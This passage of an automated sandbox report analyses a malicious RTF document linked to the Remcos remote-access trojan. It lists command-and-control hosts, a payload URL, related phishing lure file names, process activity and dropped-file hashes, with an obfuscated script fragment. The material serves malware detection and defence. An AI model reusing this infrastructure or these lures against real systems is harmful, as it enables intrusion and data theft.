                                                                                                          https://raw.githubusercontent.compowershell.exe, 00000008.00000002.380584613.0000000002619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://cdn.at.atwola.com/_media/uac/msn.htmlbhvD26D.tmp.11.drfalse
                                                                                                              unknown
                                                                                                              http://go.microsoft.cpowershell.exe, 00000008.00000002.380256940.000000000074A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                                  unknown
                                                                                                                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvD26D.tmp.11.drfalse
                                                                                                                    unknown
                                                                                                                    https://secure.comodo.com/CPS0powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://policies.yahoo.com/w3c/p3p.xmlbhvD26D.tmp.11.drfalse
                                                                                                                      unknown
                                                                                                                      http://crl.entrust.net/2048ca.crl0powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.msn.com/advertisement.ad.jsbhvD26D.tmp.11.drfalse
                                                                                                                        unknown
                                                                                                                        http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs
                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        51.83.251.113
                                                                                                                        unknownFrance
                                                                                                                        16276OVHFRtrue
                                                                                                                        84.32.44.139
                                                                                                                        cavps7.duckdns.orgLithuania
                                                                                                                        33922NTT-LT-ASLTtrue
                                                                                                                        178.237.33.50
                                                                                                                        geoplugin.netNetherlands
                                                                                                                        8455ATOM86-ASATOM86NLfalse
                                                                                                                        185.199.111.133
                                                                                                                        raw.githubusercontent.comNetherlands
                                                                                                                        54113FASTLYUSfalse
                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                        Analysis ID:1526391
                                                                                                                        Start date and time:2024-10-05 14:57:19 +02:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 10m 20s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                        Number of analysed new started processes analysed:18
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:0
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample name:MKWbWHd5Ni.rtf
                                                                                                                        renamed because original name is a hash value
                                                                                                                        Original Sample Name:93f8cd6440e951545875706461d25854.rtf
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.rans.phis.troj.spyw.expl.evad.winRTF@17/18@4/4
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 71.4%
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 99%
                                                                                                                        • Number of executed functions: 183
                                                                                                                        • Number of non-executed functions: 259
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .rtf
                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                        • Attach to Office via COM
                                                                                                                        • Active ActiveX Object
                                                                                                                        • Scroll down
                                                                                                                        • Close Viewer
                                                                                                                        • Override analysis time to 78523.3534895287 for current running targets taking high CPU consumption
                                                                                                                        • Override analysis time to 157046.706979057 for current running targets taking high CPU consumption
                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3288 because there are no executed function
                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 3488 because it is empty
                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                        TimeTypeDescription
                                                                                                                        08:58:12API Interceptor317x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                        08:58:16API Interceptor8x Sleep call for process: wscript.exe modified
                                                                                                                        08:58:17API Interceptor109x Sleep call for process: powershell.exe modified
                                                                                                                        08:58:24API Interceptor6548777x Sleep call for process: RegAsm.exe modified
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        51.83.251.113GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                        • 51.83.251.113/650/WERRFF.txt
                                                                                                                        84.32.44.139GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                          178.237.33.50DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          1728080706a248a4f632b137f140bbdefdc6243fcfee4f77d8efc81faca52425088e5ea1dc575.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • geoplugin.net/json.gp
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          raw.githubusercontent.comDSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.109.133
                                                                                                                          IpEmBW3Qw5.rtfGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.199.109.133
                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.199.110.133
                                                                                                                          Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.108.133
                                                                                                                          Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.199.110.133
                                                                                                                          SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.110.133
                                                                                                                          PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.109.133
                                                                                                                          cavps7.duckdns.orgGEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                          • 84.32.44.139
                                                                                                                          rSignedContract.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                          • 54.39.12.74
                                                                                                                          rContract-FP.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                          • 54.39.12.74
                                                                                                                          geoplugin.netDSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          1728080706a248a4f632b137f140bbdefdc6243fcfee4f77d8efc81faca52425088e5ea1dc575.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          NTT-LT-ASLTNarudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.33
                                                                                                                          GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                          • 84.32.44.139
                                                                                                                          -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          BDncqpUxZl.dllGet hashmaliciousBumbleBeeBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          Midjourney.msiGet hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          BDncqpUxZl.dll.dllGet hashmaliciousBumbleBeeBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          Midjourney.msiGet hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          Report-41952.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 84.32.84.32
                                                                                                                          OVHFR81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                          • 37.187.122.30
                                                                                                                          iOD95iHt4G.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 91.134.100.221
                                                                                                                          iOD95iHt4G.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 91.134.100.221
                                                                                                                          8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                          • 51.75.82.166
                                                                                                                          mL-9921-myw.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 91.134.100.221
                                                                                                                          mL-9921-myw.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 91.134.100.221
                                                                                                                          https://rs-stripe.hometalk.com/branding/?utm_source=contentstripe&ampGet hashmaliciousUnknownBrowse
                                                                                                                          • 149.202.173.105
                                                                                                                          https://lil-loveeeees.blogspot.com/Get hashmaliciousUnknownBrowse
                                                                                                                          • 158.69.254.144
                                                                                                                          Payout Receipt.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 51.255.64.170
                                                                                                                          https://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                          • 5.196.111.73
                                                                                                                          ATOM86-ASATOM86NLDSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          1728080706a248a4f632b137f140bbdefdc6243fcfee4f77d8efc81faca52425088e5ea1dc575.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 178.237.33.50
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          05af1f5ca1b87cc9cc9b25185115607dDSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          IpEmBW3Qw5.rtfGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          StatementXofXaccount.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 185.199.111.133
                                                                                                                          No context
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4760
                                                                                                                          Entropy (8bit):4.834060479684549
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                                          MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                                          SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                                          SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                                          SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                                          Malicious:false
                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                          Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e...........................................................
                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):257430
                                                                                                                          Entropy (8bit):3.7519142330021595
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:e4DandRGY8p1BUEEcaN450D2+55dYY/fJtURH52nf:eXdRGYA1BU1s5Q2+XdYY/fJtURH52nf
                                                                                                                          MD5:8913C9EA69CDB14AB028336B7962F8EF
                                                                                                                          SHA1:7304C718BF828ADFFDFB0F605638F33F1E598DF7
                                                                                                                          SHA-256:93F2519B312FC093EC5DF617F08DAE29F9ADF9AF3CE102EAF776B5EAAF6F9513
                                                                                                                          SHA-512:001C4AD09728FC843776875A0336BB047AC428055FA6BF7B9FF29B021422C67AF7F7C82C1FA00C9E415C0D06487CFFC31BD44BEF460C5C66F34B009C442913C4
                                                                                                                          Malicious:false
                                                                                                                          Preview:..A.N.v.K.W.t.W.W.f.Z.T.G.c.z.h.W.f.A.W.k.K.x.c.l.s.L. .=. .".O.k.i.W.W.f.C.f.d.x.L.z.B.e.c.f.G.k.f.W.l.a.A.G.Z.x.".....e.W.L.R.W.L.W.u.W.G.U.J.W.I.f.L.f.U.O.P.l.K.W.j.K.x. .=. .".O.k.o.x.B.h.K.G.z.B.W.r.W.p.K.P.P.C.a.L.L.t.L.C.L.L.".....x.L.e.L.p.R.u.i.U.L.L.i.m.W.q.c.n.U.z.N.U.s.A.b.k.L. .=. .".h.W.O.W.S.P.U.c.p.u.U.L.a.P.b.I.U.f.f.k.P.Z.t.m.k.Z.".....L.i.a.s.O.W.A.N.W.v.i.p.e.r.i.n.a.k.K.L.L.l.N.e.d.i.o.L.j.i.b.K. .=. .".G.i.k.G.B.d.O.B.m.e.W.h.i.k.z.e.K.W.k.o.R.f.l.n.c.O.".....L.L.Z.q.i.H.h.q.t.h.v.C.U.L.m.A.c.e.z.B.B.P.m.c.G.p. .=. .".G.h.W.e.o.j.K.b.i.e.A.N.o.m.r.t.l.h.K.G.W.W.L.b.P.B.".....d.C.C.W.U.G.R.z.U.e.W.L.G.G.h.b.C.G.Q.U.Z.c.L.a.u.i. .=. .".e.v.W.K.j.I.k.L.O.G.L.z.i.S.g.A.z.T.u.K.C.h.p.i.c.W.".....L.B.U.W.k.k.G.c.Z.L.A.g.p.W.r.L.p.b.Z.P.Z.L.K.i.U.o. .=. .".s.n.i.Q.i.o.z.N.n.O.G.N.r.n.Q.z.h.u.L.L.O.p.G.o.c.S.".....i.U.Z.h.l.k.z.i.k.T.t.m.m.K.c.l.b.U.R.t.G.L.i.c.K.z. .=. .".p.K.a.i.i.k.G.L.K.i.W.r.Z.c.o.e.B.c.W.o.R.v.i.K.R.k.".....W.O.m.x.A.q.C.b.C.u.L.L.H.n.z.A.R.N.p.L.W.
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):962
                                                                                                                          Entropy (8bit):5.013130376969173
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                          MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                                                                                          SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                                                                                          SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                                                                                          SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                                                                                          Malicious:false
                                                                                                                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3::
                                                                                                                          MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                                          Malicious:false
                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1024
                                                                                                                          Entropy (8bit):0.05390218305374581
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                          Malicious:false
                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12288
                                                                                                                          Entropy (8bit):3.583224921343654
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:webTm+Wg9CEM/Ikt2wJ21yO7Xte6oHx33qzqRyo5HQVzD8dGZ2EgOJgTk6QfaXTh:wyiA0EU5IwJ21yO790x3mcyo5HQadGEj
                                                                                                                          MD5:ADC30B03D6D5519C3B1DA09CEA6C8AC1
                                                                                                                          SHA1:33311F91A0820967930156E64EA68EB61B8FC78F
                                                                                                                          SHA-256:7E8E855D04338E14D5E6066D013DC687E335A7902F8CE097110E6C625C02B95E
                                                                                                                          SHA-512:A77104C25094018D4546E08534FCDE2CCF5AB7C61BAE27107C06FA0F90B589D0A1C9A1411EA010400008A78DC765F282D3CDC12620D0E4C22C35050845EF740A
                                                                                                                          Malicious:false
                                                                                                                          Preview:............4.8.3.7.7.4.2.5.?.`.#.`.8.`.%.!...3.<.1...5.2.?.<.=...#.|.>.!.|.).:.`.3.!.5.?...5.-.3.[.5.;.../.'.*.4.+.|.*.,.+.<.5.8..._.8.2.-.>.%.&.'.&.?._.`.).0.[.^.,.~.?.'.8._.+.?.:.5.5.^./.;...#.#.?.].3.(.&.]...[.8./.`.%.].~.2.4.?._.^.,.'...'.?.!.9.:.(.?.?.!._.-.;._.#.[.?.=.|.<.,...(.5.@.8.^.#...~.].?.<.?.?.%.[.?.?.8.7.#.[.2.4.?.+.9.?.?.0.^.$._.<.&.@.?...6.%.~./...'.#.:.-.8.[.%.3.3.<.9.).]...2.=.;.-.?.#.<.;.!.?.2.?...1.-...?.;.>.0.2./.-.=.(.|.2.?.?.=...].].2.|.>...*.2.[...~.7...[.#.!.8.(.>.%.2.....=.`...$.(.-.&.%.+./.9.4.&.2.<.!.?.4.,...@.#.'.:.-.4.'.:.=...!.].6.@.+.%./.~.%.(.,.2.,.?...`...;./.%.!.!.6.2.4.?.5.).*.!...&.|.0...9...3.$.;.:.?.@.~.3...=.[.7.).`.,.`.0.?.!.%.4.7.?.7.!...(.5.[.0.$.;.4.?.$.$.-.3.6.-.1.5.'.;.$.7.`.6.?._.>.^.5.=.8.`...~.$.6.>.8.).;.4.?.#.?.9...<.^._...|.8.3.+.!./...#.?.5.>...4._...5.2.<.^.<.#.@.].).?...|.>.~.|.?...3.5.%.;.)...[.?.<.?.1.].[.7.-.0.,.:.|.)...+.6.#...-.4.-.].1.3.?.[.%.%.`.'.<.8./.^...;.$.^.^.).~.3.=...'.~.4.(.-.<.9./.-.<...`.0.@...(.1.6.#./._.?...`.
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3bb10206, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):21037056
                                                                                                                          Entropy (8bit):1.1390580103680599
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:0O1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:0OEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                          MD5:6B69E900809D0C45343D5ED66D0D86B3
                                                                                                                          SHA1:1F5FB7A7FCF29B31C55123BB2AFA35F98A28D351
                                                                                                                          SHA-256:70ADD53EA5CCDDFA03A25B89EFA9FFC58AE296B6448ED29B4D6C80B52F7E30B7
                                                                                                                          SHA-512:2E6A83B77B5EFAAC7B29A7356D56DEC75130C15292D42504DF1574062D53EDE5D092EADA351363E5381C6697A548E497E6BAF715DF8507B945017EDDDC042EBF
                                                                                                                          Malicious:false
                                                                                                                          Preview:;...... ........................u..............................;:...{...;...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
